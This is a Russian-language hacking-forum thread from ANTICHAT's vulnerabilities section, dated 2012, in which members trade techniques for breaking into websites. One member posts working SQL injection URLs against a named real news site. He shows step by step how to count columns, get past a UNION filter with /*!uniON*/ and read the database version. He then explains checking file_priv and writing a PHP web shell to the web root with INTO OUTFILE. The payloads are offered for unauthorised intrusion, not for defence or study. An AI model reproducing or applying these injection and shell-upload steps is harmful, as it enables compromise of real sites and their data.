HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.01.2012, 14:08
AlonDelon
Постоянный
Регистрация: 12.11.2010
Сообщений: 322
С нами: 8157206

Репутация: -3
По умолчанию

можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.

CMS WP

Цитата:
Сообщение от None  
If you are the webmaster of this site make sure that:
* You have uploaded correctly your files to the public_html directory which is the web-root of your account;
* You have not misspelled the URL. Bear in mind that letters are case sensitive and no blank spaces are recommended;
* In case you have applied SEO - SEF URL rewrite rules, make sure you have renamed the htaccess.txt file to .htaccess. If there is already a non-empty .htaccess file, check it and make sure the necessary rules are uncommented.
 
Ответить с цитированием

  #2  
Старый 03.01.2012, 14:10
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от AlonDelon  
можно как нибудь обойти и авторизоваться, если в админку не пускает? логин - пароль есть.
CMS WP
Инглиш бро. Криво установлено все.
 
Ответить с цитированием

  #3  
Старый 03.01.2012, 15:28
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?

_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
 
Ответить с цитированием

  #4  
Старый 03.01.2012, 15:41
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от er9j6@  
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается?
_http://1cnews.com/index.php?mode=search&sstring='and(select*from(sel ect(name_const(version(),1)),name_const(version(), 1))a)and'
Код:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title 5.1.33-log

Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто
 
Ответить с цитированием

  #5  
Старый 03.01.2012, 15:56
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами: 7712246

Репутация: 23
По умолчанию

Цитата:
Сообщение от Ereee  
Код:
http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f
В title
5.1.33-log
Вот так бро
А то в поиске заморочки с LIKE. Вообщем все гениальное просто
как ты количество полей подобрал, каким запросом?
 
Ответить с цитированием

  #6  
Старый 03.01.2012, 16:01
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от er9j6@  
как ты количество полей подобрал, каким запросом?
Тут главное внимательность.

http://1cnews.com/index.php?mode=viewpart&part=10

Делаем запрос:

http://1cnews.com/index.php?mode=viewpart&part=10'

В заголовке исчезает "Events of the branch". Что то тут не так

Проверяем на inj.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1

"Events of the branch" появился. А если:

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2

Исчез. Соответственно, true и false.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+1 0--+f

Заголовок исчез.

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f

Пояивлся, соответственно, кол-во 3.

Ну а дальше

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+sele ct+1,2,3--+f

403 forbidden

Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/

Пробуем

http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f

Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2.

P.S. Вообщем контент-based injection
 
Ответить с цитированием

  #7  
Старый 03.01.2012, 17:48
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Есть доступ к бд как залить shell ?
 
Ответить с цитированием

  #8  
Старый 03.01.2012, 17:52
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от Groove  
Есть доступ к бд как залить shell ?
Сначала посмотри File_priv. Для этого:

http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f

Копируем юзера.

http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f

Если выведет N, то залить не получится. Если Y + mq=off, то:

http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f

После этого шелл будет по адресу site.ltd/dir/file.php
 
Ответить с цитированием

  #9  
Старый 03.01.2012, 17:56
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ereee  
Сначала посмотри File_priv. Для этого:
http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f
Копируем юзера.
http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where +user='тут юзер'--+f
Если выведет N, то залить не получится. Если Y + mq=off, то:
http://site.ltd/a.php?a=-1+union+select+1,,3+into+outfile+'/path/to/www/dir/file.php'--+f
После этого шелл будет по адресу site.ltd/dir/file.php
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
 
Ответить с цитированием

  #10  
Старый 03.01.2012, 18:27
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от Groove  
У меня прямой доступ =) Нут не sql inj ) Захожу через Navicat
Ты про это наверно:

PHP код:
[COLOR="#000000"]select '[COLOR="#0000BB"][/COLOR]' into outfile '/path/to/www/dir/file.php'[/COLOR
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...